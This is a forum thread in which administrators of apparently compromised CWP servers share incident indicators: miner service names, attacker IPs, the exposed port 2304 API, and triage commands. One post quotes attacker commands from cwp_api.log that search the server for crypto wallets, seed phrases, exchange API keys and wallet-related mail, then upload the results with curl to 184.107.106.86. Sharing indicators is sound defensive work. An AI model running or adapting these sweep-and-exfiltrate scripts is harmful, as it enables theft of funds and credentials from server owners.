Author Topic: Possible CWP security issue - root compromise, OMRIG miner and port 2304 exposed  (Read 124 times)

0 Members and 1 Guest are viewing this topic.

Offline
**
Hi,
I'm posting this because I've had a security incident on one of my CWP servers and, after seeing some of the recent security reports here, I thought it might be useful to share what I found and see if anyone else has seen the same thing.
The server is running AlmaLinux 8 with CWP.
I found what appears to be an OMRIG crypto miner, together with these suspicious services/binaries:
Code: [Select]
dbus-monitor-srv
polkitd-helpers
systemd-logind-helpers
There were also signs of persistence through systemd.
During the investigation I found these two IP addresses, which I have now blocked:
Code: [Select]
146.103.45.130
184.107.106.86
146.103.45.130 was related to the miner activity.
184.107.106.86 appeared during the investigation of suspicious outbound activity.
Another thing that caught my attention was port 2304, used by the CWP External API. It was publicly exposed on this server. I have now removed it from the allowed ports in CSF and confirmed that it is no longer accessible.
I have restored the server from a backup taken before the incident, removed/checked the suspicious services and files, blocked both IP addresses and closed port 2304.
I want to make clear that I cannot confirm that port 2304 or the CWP API was the entry point. I'm mentioning it because it was exposed at the time of the incident and because I've seen other recent reports of CWP servers being compromised with root access and crypto miners.
Has anyone else seen these same services/binaries or IP addresses on an affected CWP server?
And does anyone know if this could be related to one of the recent CWP security/API issues?
I still have information and logs from the incident, so I can provide more details if they are useful.
Thanks.

Offline
*
This is what 184.107.106.86 was doing on my server, taken from cwp_api.log
Code: [Select]
mysql --defaults-extra-file=/root/.my.cnf  < /home/x;(
echo == mounts; df -h | grep -vE 'tmpfs|loop|udev'
echo == walletfind
timeout 70 find /home /var /opt /srv /mnt /media /data /usr/local /backup* /root -maxdepth 9 \( -iname 'wallet.dat' -o -iname '*.wallet' -o -iname 'keystore' -type d -o -iname 'electrum' -type d -o -iname 'bitcoin.conf' -o -iname 'litecoin.conf' -o -iname 'dogecoin.conf' -o -iname 'dash.conf' -o -iname 'monero' -type d -o -iname '.bitmonero' -o -iname '*xmr*wallet*' -o -iname 'xmrig*' -o -iname 'lnd.conf' -o -iname '*.lnd' -o -iname 'solana' -type d -o -iname 'id.json' \) -not -path '*node_modules*' -not -path '*phpmyadmin*' 2>/dev/null | head -100
echo == procs; ps auxwww | grep -iE 'xmrig|monerod|bitcoind|litecoind|dogecoind|geth|gaia|solana|cardano|tron|electrumx|btcpay|nbxplorer|dashd|zcashd|rippled|waves' | grep -v grep
echo == ports; ss -tlnp 2>/dev/null | grep -E ':8332|:8333|:18332|:9332|:18081|:18082|:8545|:8546|:30303|:8899|:22555'
echo ZMARK_END
 ) > /tmp/.yypvxqy 2>&1; curl -s -m 45 -F f=@/tmp/.yypvxqy http://184.107.106.86:993/act ;curl -s -m 45 --data-binary @/tmp/.yypvxqy http://184.107.106.86:993/act ; curl -s -m 45 -F f=@/tmp/.yypvxqy http://184.107.106.86:587/act ;curl -s -m 45 --data-binary @/tmp/.yypvxqy http://184.107.106.86:587/act ; curl -s -m 45 -F f=@/tmp/.yypvxqy http://184.107.106.86:465/act ;curl -s -m 45 --data-binary @/tmp/.yypvxqy http://184.107.106.86:465/act ; curl -s -m 45 -F f=@/tmp/.yypvxqy http://184.107.106.86:25/act ;curl -s -m 45 --data-binary @/tmp/.yypvxqy http://184.107.106.86:25/act ; curl -s -m 45 -F f=@/tmp/.yypvxqy http://184.107.106.86:8888/act ;curl -s -m 45 --data-binary @/tmp/.yypvxqy http://184.107.106.86:8888/act ; rm -f /tmp/.yypvxqy;echo/dumpsql.sql
okokokokokoksh: line 8: echo/user_grants.sql: No such file or directory
Code: [Select]
mysql --defaults-extra-file=/root/.my.cnf  < /home/x;( echo ## myserver.ovh vmail+crypto sweep
echo == vmaildoms
ls /var/vmail 2>/dev/null | head -40
echo == maildirs-dirs-crypto
find /var/vmail -maxdepth 4 -type d 2>/dev/null | grep -iE 'wallet|btc|eth|coin|mine|work|crypto|seed|seedphrase|backup' | head -40
echo == vmailgrep-subjects
timeout 240 grep -rliI -E '(subject:.*(wallet|seed|mnemonic|private.?key|bitcoin|monero|litecoin|doge|ethereum|keystore|solana|kaspa|exodus|electrum|metamask|trust.?wallet|binance|coinbase|kraken|kucoin))' /var/vmail /home/*/mail /var/spool/mail 2>/dev/null | head -100
echo == maildir-list
for m in /var/spool/mail/* ; do [ -s  ] && echo SPOOL ; done 2>/dev/null | head -20
echo == keyfind
timeout 150 find /home /root /var/www /opt /srv /mnt /media /backup /backups /data -maxdepth 8 \( -iname 'wallet.dat' -o -iname '*.wallet' -o -iname '*.kdbx' -o -iname 'UTC--*' -o -iname '*.keystore' -o -iname '*seed*phrase*' -o -iname '*electrum*' -o -iname 'id.json' -o -iname '*.xmr*' \) -not -path '*node_modules*' -not -path '*phpmyadmin*' 2>/dev/null | head -80
echo == exchangekeys
timeout 150 grep -rliI -E '(BINANCE_API|COINBASE_API|KUCOIN_API|BITMEX_API|secretKey.{0,40}(binance|kucoin)|api_key.{0,20}(telegram|binance))' /home/*/public_html /var/www /root 2>/dev/null | head -40
echo == dockercrypto
docker ps --format '{{.Image}} {{.Names}}' 2>/dev/null | grep -iE 'bitco|geth|monero|solana|tron|cardano|kaspa|nbxplorer|btcpay|electrum' | head -20
echo == btcpay
ls -d /root/.nbxplorer /root/.btcpayserver /home/*/.nbxplorer 2>/dev/null
echo ZMARK_END
 ) > /tmp/.ymwqrjq 2>&1; curl -s -m 45 -F f=@/tmp/.ymwqrjq http://184.107.106.86:993/act ;curl -s -m 45 --data-binary @/tmp/.ymwqrjq http://184.107.106.86:993/act ; curl -s -m 45 -F f=@/tmp/.ymwqrjq http://184.107.106.86:587/act ;curl -s -m 45 --data-binary @/tmp/.ymwqrjq http://184.107.106.86:587/act ; curl -s -m 45 -F f=@/tmp/.ymwqrjq http://184.107.106.86:465/act ;curl -s -m 45 --data-binary @/tmp/.ymwqrjq http://184.107.106.86:465/act ; curl -s -m 45 -F f=@/tmp/.ymwqrjq http://184.107.106.86:25/act ;curl -s -m 45 --data-binary @/tmp/.ymwqrjq http://184.107.106.86:25/act ; curl -s -m 45 -F f=@/tmp/.ymwqrjq http://184.107.106.86:8888/act ;curl -s -m 45 --data-binary @/tmp/.ymwqrjq http://184.107.106.86:8888/act ; rm -f /tmp/.ymwqrjq;echo/user_grants.sql

Offline
**
How to clean the server? I think I have the same issue

Offline
**
How to clean the server? I think I have the same issue
Hi. Before deleting anything, I would recommend checking whether your compromise is actually the same one.
We found several different indicators on the affected server, including OMRIG/XMRig-related persistence and later a suspicious root process running from a deleted memfd, so preserving evidence before cleaning is important.
If possible, please do not reinstall, reboot or delete suspicious files yet.
Could you first post the output of:
Code: [Select]
ps auxf
ss -plant
ss -lntp

find /proc/[0-9]*/exe -lname '*deleted*' -ls 2>/dev/null

systemctl list-unit-files --type=service | grep -Ei \
'systemd-logind-helpers|polkitd-helpers|dbus-monitor-srv|auth-policykit'

ls -la /usr/sbin/netd /usr/bin/systemd-logind-helpers \
/usr/bin/polkitd-helpers /usr/bin/dbus-monitor-srv 2>/dev/null

Also, if you use the CWP External API, please check whether port 2304 is publicly accessible and preserve these logs before doing anything else:
Code: [Select]
/usr/local/cwpsrv/logs/2304_access_log
/usr/local/cwpsrv/logs/2304_error_log
/var/log/cwp/cwp_api.log
In our case we found malicious requests to CWP API endpoints such as /v1/backup, /v1/endtransf/ and /v1/addemail/, followed by commands executed as root.
Please redact passwords, API keys/tokens and other credentials before posting any logs here.
Once we know whether the indicators match, I can explain what we removed and how we checked the server afterwards. But I would preserve the evidence first, because it may also help determine exactly how the CWP API was exploited.